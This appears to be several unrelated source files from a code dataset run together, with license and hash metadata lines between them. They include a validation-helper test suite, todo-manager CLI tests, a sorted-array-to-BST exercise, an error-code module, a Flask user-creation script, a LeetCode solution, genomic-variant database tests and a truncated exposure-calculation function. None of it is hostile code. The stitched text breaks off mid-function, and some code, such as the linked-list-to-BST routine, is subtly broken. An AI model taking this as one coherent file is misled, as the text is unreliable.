flex_row = {'just one': 'column'}
assert validation_helper.concat_flex(flex_row) == 'just one: column'
def test_derive_unique_id():
row = {'display_tas': 'DISPLAY-TAS', 'afa_generated_unique': 'AFA-GENERATED-UNIQUE', 'something': 'else'}
assert validation_helper.derive_unique_id(row, is_fabs=True) == 'AssistanceTransactionUniqueKey:' \
' AFA-GENERATED-UNIQUE'
assert validation_helper.derive_unique_id(row, is_fabs=False) == 'TAS: DISPLAY-TAS'
def test_derive_fabs_awarding_sub_tier():
row = {'awarding_sub_tier_agency_c': '9876', 'awarding_office_code': '4567'}
derive_row = {'awarding_sub_tier_agency_c': None, 'awarding_office_code': '4567'}
office_list = {'4567': '0123'}
# Normal
assert validation_helper.derive_fabs_awarding_sub_tier(row, office_list) == '9876'
# Derivation
assert validation_helper.derive_fabs_awarding_sub_tier(derive_row, office_list) == '0123'
# Failed Derivation
assert validation_helper.derive_fabs_awarding_sub_tier(derive_row, {}) is None
def test_derive_fabs_afa_generated_unique():
# All populated
row = {'awarding_sub_tier_agency_c': '0123',
'fain': 'FAIN',
'uri': 'URI',
'cfda_number': '4567',
'award_modification_amendme': '0'}
assert validation_helper.derive_fabs_afa_generated_unique(row) == '0123_FAIN_URI_4567_0'
# Some missing
row = {'awarding_sub_tier_agency_c': '0123',
'fain': None,
'uri': 'URI',
'cfda_number': '4567',
'award_modification_amendme': None}
assert validation_helper.derive_fabs_afa_generated_unique(row) == '0123_-none-_URI_4567_-none-'
# All missing
row = {'awarding_sub_tier_agency_c': None,
'fain': None,
'uri': None,
'cfda_number': None,
'award_modification_amendme': None}
assert validation_helper.derive_fabs_afa_generated_unique(row) == '-none-_-none-_-none-_-none-_-none-'
def test_derive_fabs_unique_award_key():
# Record type 1 - choose URI
row = {'awarding_sub_tier_agency_c': '0123',
'fain': 'FAIN',
'uri': 'URI',
'record_type': '1'}
assert validation_helper.derive_fabs_unique_award_key(row) == 'ASST_AGG_URI_0123'
row = {'awarding_sub_tier_agency_c': None,
'fain': 'FAIN',
'uri': None,
'record_type': '1'}
assert validation_helper.derive_fabs_unique_award_key(row) == 'ASST_AGG_-NONE-_-NONE-'
# Record type 2 - choose FAIN
row = {'awarding_sub_tier_agency_c': '4567',
'fain': 'FAIN',
'uri': 'URI',
'record_type': '2'}
assert validation_helper.derive_fabs_unique_award_key(row) == 'ASST_NON_FAIN_4567'
row = {'awarding_sub_tier_agency_c': None,
'fain': None,
'uri': 'URI',
'record_type': '2'}
assert validation_helper.derive_fabs_unique_award_key(row) == 'ASST_NON_-NONE-_-NONE-'
def test_apply_label():
# Normal case
labels = {'field_name': 'field_label'}
row = {'Field Name': 'field_name'}
assert validation_helper.apply_label(row, labels, is_fabs=True) == 'field_label'
# Field name not in labels
row = {'Field Name': 'other_field_name'}
assert validation_helper.apply_label(row, labels, is_fabs=True) == ''
# Not FABS
row = {'Field Name': 'field_name'}
assert validation_helper.apply_label(row, labels, is_fabs=False) == ''
def test_gather_flex_fields():
flex_data = pd.DataFrame({'row_number': ['1', '2', '3', '4', '5'],
'concatted': ['A', 'B', 'C', 'D', 'E']})
row = {'Row Number': '4'}
assert validation_helper.gather_flex_fields(row, flex_data) == 'D'
assert validation_helper.gather_flex_fields(row, None) == ''
def test_valid_type():
str_field = FileColumn(field_types_id=FIELD_TYPE_DICT['STRING'])
int_field = FileColumn(field_types_id=FIELD_TYPE_DICT['INT'])
csv_schema = {'str_field': str_field, 'int_field': int_field}
# For more detailed tests, see is_valid_type
row = {'Field Name': 'int_field', 'Value Provided': 'this is a string'}
assert validation_helper.valid_type(row, csv_schema) is False
row = {'Field Name': 'int_field', 'Value Provided': '1000'}
assert validation_helper.valid_type(row, csv_schema) is True
def test_expected_type():
bool_field = FileColumn(field_types_id=FIELD_TYPE_DICT['BOOLEAN'])
dec_field = FileColumn(field_types_id=FIELD_TYPE_DICT['DECIMAL'])
csv_schema = {'bool_field': bool_field, 'dec_field': dec_field}
row = {'Field Name': 'bool_field'}
assert validation_helper.expected_type(row, csv_schema) == 'This field must be a boolean'
row = {'Field Name': 'dec_field'}
assert validation_helper.expected_type(row, csv_schema) == 'This field must be a decimal'
def test_valid_length():
length_field = FileColumn(length=5)
non_length_field = FileColumn()
csv_schema = {'length_field': length_field, 'non_length_field': non_length_field}
row = {'Field Name': 'length_field', 'Value Provided': 'this is more than five characters'}
assert validation_helper.valid_length(row, csv_schema) is False
row = {'Field Name': 'length_field', 'Value Provided': 'four'}
assert validation_helper.valid_length(row, csv_schema) is True
row = {'Field Name': 'non_length_field', 'Value Provided': 'can be any length'}
assert validation_helper.valid_length(row, csv_schema) is True
def test_expected_length():
length_field = FileColumn(length=5)
non_length_field = FileColumn()
csv_schema = {'length_field': length_field, 'non_length_field': non_length_field}
row = {'Field Name': 'length_field'}
assert validation_helper.expected_length(row, csv_schema) == 'Max length: 5'
row = {'Field Name': 'non_length_field'}
assert validation_helper.expected_length(row, csv_schema) == 'Max length: None'
def test_update_field_name():
short_cols = {'short_field_name': 'sfn'}
row = {'Field Name': 'short_field_name'}
assert validation_helper.update_field_name(row, short_cols) == 'sfn'
row = {'Field Name': 'long_field_name'}
assert validation_helper.update_field_name(row, short_cols) == 'long_field_name'
def test_add_field_name_to_value():
row = {'Field Name': 'field_name', 'Value Provided': 'value_provided'}
assert validation_helper.add_field_name_to_value(row) == 'field_name: value_provided'
def test_check_required():
data = pd.DataFrame({'row_number': ['1', '2', '3', '4', '5'],
'unique_id': ['ID1', 'ID2', 'ID3', 'ID4', 'ID5'],
'required1': ['Yes', 'Yes', None, 'Yes', None],
'required2': ['Yes', None, 'Yes', None, None],
'not_required1': [None, None, 'Yes', None, None],
'not_required2': ['Yes', 'Yes', None, 'Yes', 'Yes']})
required = ['required1', 'required2']
required_labels = {'required1': 'Required 1'}
report_headers = ValidationManager.report_headers
short_cols = {'required1': 'req1', 'not_required1': 'n_req1', 'not_required2': 'n_req2'}
flex_data = pd.DataFrame({'row_number': ['1', '2', '3', '4', '5'],
'concatted': ['A', 'B', 'C', 'D', 'E']})
is_fabs = False
error_msg = ValidationError.requiredErrorMsg
expected_value = '(not blank)'
error_type = ValidationError.requiredError
# report_headers = ['Unique ID', 'Field Name', 'Rule Message', 'Value Provided', 'Expected Value', 'Difference',
# 'Flex Field', 'Row Number', 'Rule Label'] + ['error_type']
expected_data = [
['ID3', 'req1', error_msg, '', expected_value, '', 'C', '3', '', error_type],
['ID5', 'req1', error_msg, '', expected_value, '', 'E', '5', '', error_type],
['ID2', 'required2', error_msg, '', expected_value, '', 'B', '2', '', error_type],
['ID4', 'required2', error_msg, '', expected_value, '', 'D', '4', '', error_type],
['ID5', 'required2', error_msg, '', expected_value, '', 'E', '5', '', error_type]
]
expected_error_df = pd.DataFrame(expected_data, columns=report_headers + ['error_type'])
error_df = validation_helper.check_required(data, required, required_labels, report_headers, short_cols, flex_data,
is_fabs)
assert_frame_equal(error_df, expected_error_df)
is_fabs = True
expected_data = [
['ID3', 'req1', error_msg, '', expected_value, '', 'C', '3', 'Required 1', error_type],
['ID5', 'req1', error_msg, '', expected_value, '', 'E', '5', 'Required 1', error_type],
['ID2', 'required2', error_msg, '', expected_value, '', 'B', '2', '', error_type],
['ID4', 'required2', error_msg, '', expected_value, '', 'D', '4', '', error_type],
['ID5', 'required2', error_msg, '', expected_value, '', 'E', '5', '', error_type]
]
expected_error_df = pd.DataFrame(expected_data, columns=report_headers + ['error_type'])
error_df = validation_helper.check_required(data, required, required_labels, report_headers, short_cols, flex_data,
is_fabs)
assert_frame_equal(error_df, expected_error_df)
def test_check_type():
data = pd.DataFrame({'row_number': ['1', '2', '3', '4', '5'],
'unique_id': ['ID1', 'ID2', 'ID3', 'ID4', 'ID5'],
'int': ['1', '2', '3', 'no', '5'],
'dec': ['1.3', '1', 'no', '1232', '4.3'],
'bool': ['no', 'Yes', 'TRUE', 'false', '4'],
'string': ['this', 'row', 'should', 'be', 'ignored']})
type_fields = ['int', 'bool', 'dec']
type_labels = {'int': 'Integer', 'dec': 'Decimal'}
report_headers = ValidationManager.report_headers
csv_schema = {'int': FileColumn(field_types_id=FIELD_TYPE_DICT['INT']),
'bool': FileColumn(field_types_id=FIELD_TYPE_DICT['BOOLEAN']),
'dec': FileColumn(field_types_id=FIELD_TYPE_DICT['DECIMAL'])}
short_cols = {'int': 'i', 'bool': 'b'}
flex_data = pd.DataFrame({'row_number': ['1', '2', '3', '4', '5'],
'concatted': ['A', 'B', 'C', 'D', 'E']})
is_fabs = False
error_msg = ValidationError.typeErrorMsg
error_type = ValidationError.typeError
# report_headers = ['Unique ID', 'Field Name', 'Rule Message', 'Value Provided', 'Expected Value', 'Difference',
# 'Flex Field', 'Row Number', 'Rule Label'] + ['error_type']
expected_data = [
['ID4', 'i', error_msg, 'i: no', 'This field must be a int', '', 'D', '4', '', error_type],
['ID5', 'b', error_msg, 'b: 4', 'This field must be a boolean', '', 'E', '5', '', error_type],
['ID3', 'dec', error_msg, 'dec: no', 'This field must be a decimal', '', 'C', '3', '', error_type]
]
expected_error_df = pd.DataFrame(expected_data, columns=report_headers + ['error_type'])
error_df = validation_helper.check_type(data, type_fields, type_labels, report_headers, csv_schema, short_cols,
flex_data, is_fabs)
assert_frame_equal(error_df, expected_error_df)
is_fabs = True
expected_data = [
['ID4', 'i', error_msg, 'i: no', 'This field must be a int', '', 'D', '4', 'Integer', error_type],
['ID5', 'b', error_msg, 'b: 4', 'This field must be a boolean', '', 'E', '5', '', error_type],
['ID3', 'dec', error_msg, 'dec: no', 'This field must be a decimal', '', 'C', '3', 'Decimal', error_type]
]
expected_error_df = pd.DataFrame(expected_data, columns=report_headers + ['error_type'])
error_df = validation_helper.check_type(data, type_fields, type_labels, report_headers, csv_schema, short_cols,
flex_data, is_fabs)
assert_frame_equal(error_df, expected_error_df)
def test_check_length():
data = pd.DataFrame({'row_number': ['1', '2', '3', '4', '5'],
'unique_id': ['ID1', 'ID2', 'ID3', 'ID4', 'ID5'],
'has_length': ['1', '12', '123', '1234', '12345'],
'no_length': ['', '1', 'no', '1232', '4.3']})
length_fields = ['has_length']
report_headers = ValidationManager.report_headers
csv_schema = {'has_length': FileColumn(length=3),
'no_length': FileColumn()}
short_cols = {'has_length': 'len'}
flex_data = pd.DataFrame({'row_number': ['1', '2', '3', '4', '5'],
'concatted': ['A', 'B', 'C', 'D', 'E']})
type_error_rows = ['5']
error_msg = ValidationError.lengthErrorMsg
error_type = ValidationError.lengthError
# report_headers = ['Unique ID', 'Field Name', 'Rule Message', 'Value Provided', 'Expected Value', 'Difference',
# 'Flex Field', 'Row Number', 'Rule Label'] + ['error_type']
expected_data = [
['ID4', 'len', error_msg, 'len: 1234', 'Max length: 3', '', 'D', '4', '', error_type]
]
expected_error_df = pd.DataFrame(expected_data, columns=report_headers + ['error_type'])
error_df = validation_helper.check_length(data, length_fields, report_headers, csv_schema, short_cols, flex_data,
type_error_rows)
assert_frame_equal(error_df, expected_error_df)
def test_check_field_format():
data = pd.DataFrame({'row_number': ['1', '2', '3', '4', '5'],
'unique_id': ['ID1', 'ID2', 'ID3', 'ID4', 'ID5'],
'dates': [None, '20200101', '200012', 'abcdefgh', '20201301']})
format_fields = ['dates']
report_headers = ValidationManager.report_headers
short_cols = {'dates': 'date'}
flex_data = pd.DataFrame({'row_number': ['1', '2', '3', '4', '5'],
'concatted': ['A', 'B', 'C', 'D', 'E']})
error_msg = ValidationError.fieldFormatErrorMsg
error_type = ValidationError.fieldFormatError
# report_headers = ['Unique ID', 'Field Name', 'Rule Message', 'Value Provided', 'Expected Value', 'Difference',
# 'Flex Field', 'Row Number', 'Rule Label'] + ['error_type']
expected_data = [
['ID3', 'date', error_msg, 'date: 200012', 'A date in the YYYYMMDD format.', '', 'C', '3', 'DABSDATETIME',
error_type],
['ID4', 'date', error_msg, 'date: abcdefgh', 'A date in the YYYYMMDD format.', '', 'D', '4', 'DABSDATETIME',
error_type],
['ID5', 'date', error_msg, 'date: 20201301', 'A date in the YYYYMMDD format.', '', 'E', '5', 'DABSDATETIME',
error_type]
]
expected_error_df = pd.DataFrame(expected_data, columns=report_headers + ['error_type'])
error_df = validation_helper.check_field_format(data, format_fields, report_headers, short_cols, flex_data)
assert_frame_equal(error_df, expected_error_df)
def test_parse_fields(database):
sess = database.session
fields = [
FileColumn(name_short='string', field_types_id=FIELD_TYPE_DICT['STRING'], length=5),
FileColumn(name_short='bool', field_types_id=FIELD_TYPE_DICT['BOOLEAN'], required=True),
FileColumn(name_short='dec', field_types_id=FIELD_TYPE_DICT['DECIMAL']),
FileColumn(name_short='int', field_types_id=FIELD_TYPE_DICT['INT'], padded_flag=True, length=4, required=True),
FileColumn(name_short='date', field_types_id=FIELD_TYPE_DICT['DATE'])
]
sess.add_all(fields)
expected_parsed_fields = {
'required': ['bool', 'int'],
'number': ['dec', 'int'],
'boolean': ['bool'],
'format': ['date'],
'length': ['string', 'int'],
'padded': ['int']
}
expected_expected_headers = ['bool', 'int', 'dec', 'string', 'date']
expected_headers, parsed_fields = validation_helper.parse_fields(sess, fields)
assert parsed_fields == expected_parsed_fields
assert set(expected_headers) == set(expected_expected_headers)
def test_process_formatting_errors():
short_rows = ['1', '4', '5']
long_rows = ['2', '6']
error_msg = ValidationError.readErrorMsg
error_type = ValidationError.readError
error_name = 'Formatting Error'
report_headers = ValidationManager.report_headers
expected_data = [
['', error_name, error_msg, '', '', '', '', '1', '', error_type],
['', error_name, error_msg, '', '', '', '', '2', '', error_type],
['', error_name, error_msg, '', '', '', '', '4', '', error_type],
['', error_name, error_msg, '', '', '', '', '5', '', error_type],
['', error_name, error_msg, '', '', '', '', '6', '', error_type]
]
expected_format_error_df = pd.DataFrame(expected_data, columns=report_headers + ['error_type'])
assert_frame_equal(validation_helper.process_formatting_errors(short_rows, long_rows, report_headers),
expected_format_error_df)
def test_simple_file_scan():
# Note: only testing locally
assert validation_helper.simple_file_scan(CsvReader(), None, None, READ_ERROR) == (11, [5], [2, 3, 7], [], [])
assert validation_helper.simple_file_scan(CsvReader(), None, None, BLANK_C) == (5, [], [], [3], [4])
|
cc0-1.0
| -1,782,877,558,913,749,800 | 45.863462 | 119 | 0.588904 | false |
niavok/todomanager
|
tests/todomanagercli/todomanagerclitest.py
|
1
|
8873
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (C) 2012 Romain Roffé
#
# This file is part of Todomanager
#
# Todomanager is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# Todomanager is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Todomanager; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
import unittest
from libtodomanager.todomanager import *
from todomanagercli.commands import *
from todomanagercli.shell import *
class TestPrintTagList(unittest.TestCase):
def setUp(self):
self.todo = TodoManager()
self.cmd = CommandPrintTagList()
def runTest(self):
cmdParam = HandlerParam()
cmdParamCount = 0
res = self.cmd.runCommand(self.todo, cmdParamCount, cmdParam)
self.assertEqual(res, CommandError.kOk)
class TestAddTag(unittest.TestCase):
def setUp(self):
self.todo = TodoManager()
self.cmd = CommandAddTag()
def runTest(self):
cmdParam = HandlerParam()
setattr(cmdParam, "name", "Tag1")
cmdParamCount = 1
self.assertEqual(self.todo.getTagCount(), 0)
res = self.cmd.runCommand(self.todo, cmdParamCount, cmdParam)
self.assertEqual(res, CommandError.kOk)
self.assertEqual(self.todo.getTagCount(), 1)
res = self.cmd.runCommand(self.todo, cmdParamCount, cmdParam)
self.assertEqual(res, CommandError.kError)
self.assertEqual(self.todo.getTagCount(), 1)
cmdParam = HandlerParam()
setattr(cmdParam, "name", "Tag2")
res = self.cmd.runCommand(self.todo, cmdParamCount, cmdParam)
self.assertEqual(res, CommandError.kOk)
self.assertEqual(self.todo.getTagCount(), 2)
res = self.todo.getTagByName("Tag1")
self.assertNotEqual(res, None)
res = self.todo.getTagByName("Tag2")
self.assertNotEqual(res, None)
class TestPrintOpenedTicketList(unittest.TestCase):
def setUp(self):
self.todo = TodoManager()
self.cmd = CommandPrintOpenedTicketList()
def runTest(self):
cmdParam = HandlerParam()
cmdParamCount = 0
res = self.cmd.runCommand(self.todo, cmdParamCount, cmdParam)
self.assertEqual(res, CommandError.kOk)
class TestOpenTicket(unittest.TestCase):
def setUp(self):
self.todo = TodoManager()
self.cmd = CommandOpenTicket()
def runTest(self):
cmdParam = HandlerParam()
setattr(cmdParam, "description", "Ticket 1")
cmdParamCount = 1
self.assertEqual(self.todo.getOpenedTicketsCount(), 0)
res = self.cmd.runCommand(self.todo, cmdParamCount, cmdParam)
self.assertEqual(res, CommandError.kOk)
self.assertEqual(self.todo.getOpenedTicketsCount(), 1)
res = self.cmd.runCommand(self.todo, cmdParamCount, cmdParam)
self.assertEqual(res, CommandError.kOk)
self.assertEqual(self.todo.getOpenedTicketsCount(), 2)
ticketList = self.todo.getOpenedTickets()
self.assertEqual(ticketList.getTicketByIndex(0).getDescription(), "Ticket 1")
self.assertEqual(ticketList.getTicketByIndex(1).getDescription(), "Ticket 1")
class TestPrintTicket(unittest.TestCase):
def setUp(self):
self.todo = TodoManager()
self.cmd = CommandPrintTicket()
cmdOpenTicket = CommandOpenTicket()
cmdParam = HandlerParam()
setattr(cmdParam, "description", "Ticket 1")
cmdParamCount = 1
res = cmdOpenTicket.runCommand(self.todo, cmdParamCount, cmdParam)
self.assertEqual(res, CommandError.kOk)
def runTest(self):
cmdParam = HandlerParam()
cmdParamCount = 1
setattr(cmdParam, "ticketId", 1)
res = self.cmd.runCommand(self.todo, cmdParamCount, cmdParam)
self.assertEqual(res, CommandError.kOk)
setattr(cmdParam, "ticketId", 2)
res = self.cmd.runCommand(self.todo, cmdParamCount, cmdParam)
self.assertEqual(res, CommandError.kError)
class TestCloseTicket(unittest.TestCase):
def setUp(self):
self.todo = TodoManager()
self.cmd = CommandCloseTicket()
cmdOpenTicket = CommandOpenTicket()
cmdParam = HandlerParam()
setattr(cmdParam, "description", "Ticket 1")
cmdParamCount = 1
res = cmdOpenTicket.runCommand(self.todo, cmdParamCount, cmdParam)
self.assertEqual(res, CommandError.kOk)
def runTest(self):
cmdParam = HandlerParam()
cmdParamCount = 1
setattr(cmdParam, "ticketId", 1)
self.assertEqual(self.todo.getOpenedTicketsCount(), 1)
res = self.cmd.runCommand(self.todo, cmdParamCount, cmdParam)
self.assertEqual(res, CommandError.kOk)
self.assertEqual(self.todo.getOpenedTicketsCount(), 0)
res = self.cmd.runCommand(self.todo, cmdParamCount, cmdParam)
self.assertEqual(res, CommandError.kError)
setattr(cmdParam, "ticketId", 2)
res = self.cmd.runCommand(self.todo, cmdParamCount, cmdParam)
self.assertEqual(res, CommandError.kError)
class TestAddTagToTicket(unittest.TestCase):
def setUp(self):
self.todo = TodoManager()
self.cmd = CommandAddTagToTicket()
addTagCmd = CommandAddTag()
cmdParam = HandlerParam()
cmdParamCount = 1
setattr(cmdParam, "name", "Tag1")
res = addTagCmd.runCommand(self.todo, cmdParamCount, cmdParam)
self.assertEqual(res, CommandError.kOk)
setattr(cmdParam, "name", "Tag2")
res = addTagCmd.runCommand(self.todo, cmdParamCount, cmdParam)
self.assertEqual(res, CommandError.kOk)
self.assertEqual(self.todo.getTagCount(), 2)
self.tag1 = self.todo.getTagByName("Tag1")
self.assertNotEqual(self.tag1, None)
self.tag2 = self.todo.getTagByName("Tag2")
self.assertNotEqual(self.tag2, None)
cmdOpenTicket = CommandOpenTicket()
cmdParam = HandlerParam()
setattr(cmdParam, "description", "Ticket 1")
cmdParamCount = 1
res = cmdOpenTicket.runCommand(self.todo, cmdParamCount, cmdParam)
self.assertEqual(res, CommandError.kOk)
def runTest(self):
cmdParam = HandlerParam()
cmdParamCount = 2
setattr(cmdParam, "ticketId", 1)
setattr(cmdParam, "tagName", "Tag1")
res = self.cmd.runCommand(self.todo, cmdParamCount, cmdParam)
self.assertEqual(res, CommandError.kOk)
ticket = self.todo.getTicketById(1)
self.assertNotEqual(ticket, None)
self.assertTrue(ticket.hasTag(self.tag1))
self.assertFalse(ticket.hasTag(self.tag2))
res = self.cmd.runCommand(self.todo, cmdParamCount, cmdParam)
self.assertEqual(res, CommandError.kError)
ticket = self.todo.getTicketById(1)
self.assertNotEqual(ticket, None)
self.assertTrue(ticket.hasTag(self.tag1))
self.assertFalse(ticket.hasTag(self.tag2))
cmdParam = HandlerParam()
cmdParamCount = 2
setattr(cmdParam, "ticketId", 1)
setattr(cmdParam, "tagName", "Tag2")
res = self.cmd.runCommand(self.todo, cmdParamCount, cmdParam)
self.assertEqual(res, CommandError.kOk)
ticket = self.todo.getTicketById(1)
self.assertNotEqual(ticket, None)
self.assertTrue(ticket.hasTag(self.tag1))
self.assertTrue(ticket.hasTag(self.tag2))
cmdParam = HandlerParam()
cmdParamCount = 2
setattr(cmdParam, "ticketId", 1)
setattr(cmdParam, "tagName", "Tag3")
res = self.cmd.runCommand(self.todo, cmdParamCount, cmdParam)
self.assertEqual(res, CommandError.kError)
ticket = self.todo.getTicketById(1)
self.assertNotEqual(ticket, None)
self.assertTrue(ticket.hasTag(self.tag1))
self.assertTrue(ticket.hasTag(self.tag2))
cmdParam = HandlerParam()
cmdParamCount = 2
setattr(cmdParam, "ticketId", 2)
setattr(cmdParam, "tagName", "Tag1")
res = self.cmd.runCommand(self.todo, cmdParamCount, cmdParam)
self.assertEqual(res, CommandError.kError)
ticket = self.todo.getTicketById(1)
self.assertNotEqual(ticket, None)
self.assertTrue(ticket.hasTag(self.tag1))
self.assertTrue(ticket.hasTag(self.tag2))
if __name__ == '__main__':
unittest.main()
|
gpl-2.0
| 7,759,414,658,352,935,000 | 34.346614 | 85 | 0.66445 | false |
hs634/algorithms
|
python/trees/sorted_arr_balanced_btree.py
|
1
|
1563
|
__author__ = 'hs634'
'''Given an array where elements are sorted in ascending order, convert it to a height balanced BST.'''
'''Given a singly linked list where elements are sorted in ascending order, convert it to a height balanced BST.'''
def sorted_arr_to_balanced_btree(arr, start, end):
if start > end:
return None
    mid = start + (end - start) // 2  # floor division keeps the index an int
root = BinaryTree().add_node(arr[mid])
root.left = sorted_arr_to_balanced_btree(arr, start, mid-1)
root.right = sorted_arr_to_balanced_btree(arr, mid+1, end)
return root
def sorted_linked_list_to_balanced_btree(node_holder, start, end):
    # node_holder is a one-element list wrapping the current list node, so
    # that advancing the pointer inside a recursive call is visible to the
    # caller (rebinding a plain parameter would only be local). The original
    # version also called BinaryTree.add_node without an instance, which
    # raises a TypeError.
    if start > end:
        return None
    mid = start + (end - start) // 2
    left_child = sorted_linked_list_to_balanced_btree(node_holder, start, mid - 1)
    parent = BinaryTree().add_node(node_holder[0].data)
    parent.left = left_child
    node_holder[0] = node_holder[0].next
    parent.right = sorted_linked_list_to_balanced_btree(node_holder, mid + 1, end)
    return parent
class LinkedList():
def __init__(self):
self.head = None
def add_node(self, data):
new_node = LinkedListNode(data)
if self.head is None:
self.head = new_node
else:
new_node.next = self.head
self.head = new_node
class LinkedListNode():
def __init__(self, data):
self.data = data
self.next = None
class BinaryTree(object):
def add_node(self, data):
return Node(data)
class Node(object):
def __init__(self, data):
self.data = data
self.left = None
self.right = None
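# A minimal usage sketch (illustrative, not part of the original file):
# build a balanced BST from a sorted array, then walk it in order, which
# should print the values back in sorted order.
def _inorder(node):
    if node is None:
        return []
    return _inorder(node.left) + [node.data] + _inorder(node.right)
if __name__ == '__main__':
    root = sorted_arr_to_balanced_btree([1, 2, 3, 4, 5, 6, 7], 0, 6)
    print(_inorder(root))  # [1, 2, 3, 4, 5, 6, 7]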
|
mit
| -8,277,667,907,742,674,000 | 24.225806 | 115 | 0.619962 | false |
elifesciences/lax
|
src/publisher/codes.py
|
1
|
1533
|
"these constants help to classify errors that are raised during normal operation of Lax"
idx = {}
UNKNOWN = "unknown"
idx[
UNKNOWN
] = "an error occured that we haven't seen before to know how to best handle it"
INVALID = "invalid-article-json"
idx[
INVALID
] = "the article json failed validation against the spec. this happens at several points during INGEST and PUBLISH requests"
BAD_REQUEST = "bad-request"
idx[
BAD_REQUEST
] = "the request to lax couldn't be parsed or contained errors after being parsed"
PARSE_ERROR = "error-parsing-article-json"
idx[
PARSE_ERROR
] = """generic error we throw when we try to access something that isn't there or something that is there isn't correct, etc"""
ALREADY_PUBLISHED = "already-published"
idx[
ALREADY_PUBLISHED
] = "a PUBLISH or INGEST request was received for a specific version of an article already published. an INGEST request can happen many times before publication but can only happen after publication if the 'force' flag is present"
PREVIOUS_VERSION_UNPUBLISHED = "previous-version-unpublished"
idx[
PREVIOUS_VERSION_UNPUBLISHED
] = "attempt to ingest a version 2 when a version 1 not yet published"
PREVIOUS_VERSION_DNE = "previous-version-does-not-exist"
idx[
PREVIOUS_VERSION_DNE
] = "attempt to ingest a version 2 when a version 1 does not exist"
NO_RECORD = "record-not-found"
idx[
NO_RECORD
] = "thrown when we can't find something in the database that we expect to exist"
# ---
def explain(code):
return idx.get(code)
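# A minimal usage sketch (illustrative, not part of the original module):
# >>> explain(NO_RECORD)
# "thrown when we can't find something in the database that we expect to exist"
# >>> explain('no-such-code') is None
# True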
|
gpl-3.0
| 8,675,561,479,508,792,000 | 30.285714 | 230 | 0.742335 | false |
maia-dev/statFMB
|
statFMB/run.py
|
1
|
2049
|
import getpass
import re
from statFMB.views import app, socketio, create_tables, user_datastore, db
# NOTE: swap the comments below in order to change hosts
def main():
socketio.run(app)
#socketio.run(app, host='0.0.0.0', port='80')
def create_db():
    print('Initializing tables!')
create_tables()
create_admin_user()
    print('Database created')
def create_admin_user():
    print('Create the Administrator account')
role = 'Administrador'
create_user(role)
    print('User created!')
def create_user(role = None):
    email = input(' email: ')
    while not re.match(r'[^@]+@[^@]+\.[^@]+', email) or len(email) > 80:
        print('Invalid email!')
        email = input(' email: ')
    password = getpass.getpass(' password: ')
    while len(password) > 80:
        print('Password too long! (max. 80)')
        password = getpass.getpass(' password: ')
    name = input(' name: ')
    while len(name) > 100:
        print('Name too long! (max. 100)')
        name = input(' name: ')
    phone = input(' phone: ')
    while len(phone) != 9 or not phone.isdigit():
        print('Invalid phone number!')
        phone = input(' phone: ')
    alias = input(' alias: ')
    while len(alias) > 3 or len(alias) == 0:
        print('Invalid alias!')
        alias = input(' alias: ')
    if role is None:
        role = input(' role (Administrador, Portageiro, Visualizador): ')
    while role not in ['Administrador', 'Portageiro', 'Visualizador']:
        print('Invalid role!')
        role = input(' role (Administrador, Portageiro, Visualizador): ')
user_datastore.create_user(email = email,
password = password,
name = name,
phone = phone,
alias = alias,
)
user_datastore.add_role_to_user(email,role)
db.session.commit()
if __name__ == "__main__":
socketio.run(app)
#socketio.run(app, host='0.0.0.0', port='80')
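# A quick sanity check of the email pattern used above (illustrative):
# >>> bool(re.match(r'[^@]+@[^@]+\.[^@]+', 'user@example.com'))
# True
# >>> bool(re.match(r'[^@]+@[^@]+\.[^@]+', 'not-an-email'))
# False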
|
gpl-3.0
| -1,613,877,727,886,731,000 | 29.58209 | 77 | 0.562714 | false |
urashima9616/Leetcode_Python
|
Leet11_WaterContainer.py
|
1
|
1461
|
class Solution(object):
def maxArea(self, height):
"""
:type height: List[int]
:rtype: int
"""
        # Two-pointer sweep: start with the widest container and move the
        # shorter wall inward; moving the taller wall can never increase
        # the area, so every candidate maximum is still examined.
        max_water = 0
        left, right = 0, len(height) - 1
        while left < right:
            width = right - left
            max_water = max(max_water, width * min(height[left], height[right]))
            if height[left] < height[right]:
                left += 1
            else:
                right -= 1
        return max_water
Solve = Solution()
print(Solve.maxArea([1,1,3,1,5,1,6,2,3]))  # 18
|
gpl-3.0
| 3,932,031,442,300,702,000 | 33.809524 | 83 | 0.421629 | false |
moonso/loqusdb
|
tests/plugins/mongo/test_get_sv.py
|
1
|
1095
|
from loqusdb.build_models.variant import build_variant
def test_get_insertion(small_insert_variant, mongo_adapter, case_obj):
adapter = mongo_adapter
## GIVEN a mongo adapter with a small insertion
variant = small_insert_variant
case_id = case_obj['case_id']
formated_variant = build_variant(
variant=variant,
case_obj=case_obj,
case_id=case_id
)
adapter.add_case(case_obj)
adapter.add_structural_variant(formated_variant)
for variant_obj in adapter.db.structural_variant.find():
assert variant_obj
def test_get_translocation(translocation_variant, mongo_adapter, case_obj):
adapter = mongo_adapter
## GIVEN a mongo adapter with a translocation
variant = translocation_variant
case_id = case_obj['case_id']
formated_variant = build_variant(
variant=variant,
case_obj=case_obj,
case_id=case_id
)
adapter.add_case(case_obj)
adapter.add_structural_variant(formated_variant)
for variant_obj in adapter.db.structural_variant.find():
assert variant_obj
|
mit
| -2,922,985,057,435,951,600 | 32.181818 | 75 | 0.683105 | false |
dazult/EPA-2012-Residential-Exposure-SOPs
|
sop_calcs/paintsop.py
|
1
|
1479
|
from collections import defaultdict
from exposure_profile import ExposureProfile
def paintsop(POD, LOC, bodyweight,dermal_absorption, SA_BW_ratio, surface_residue_concentration, fraction_of_body_exposed, daily_material_to_skin_transfer_efficency, exposure_time, hand_to_mouth_event_freqency):
    # hand_to_mouth_event_freqency: 13.9 (indoor) or 20 (outdoor)
exposure_profile = ExposureProfile(bodyweight, POD, LOC, dermal_absorption=dermal_absorption)
for lifestage in ['adult','1_to_2']:
try:
exposure = surface_residue_concentration * SA_BW_ratio[lifestage] * fraction_of_body_exposed * daily_material_to_skin_transfer_efficency*bodyweight[lifestage]
        except Exception:
            exposure = "Invalid"
exposure_profile.update('dermal','paint','',lifestage, exposure)
fraction_of_hand_mouthed = 0.13
hand_surface_area = 150.
replenishment_intervals = 4.
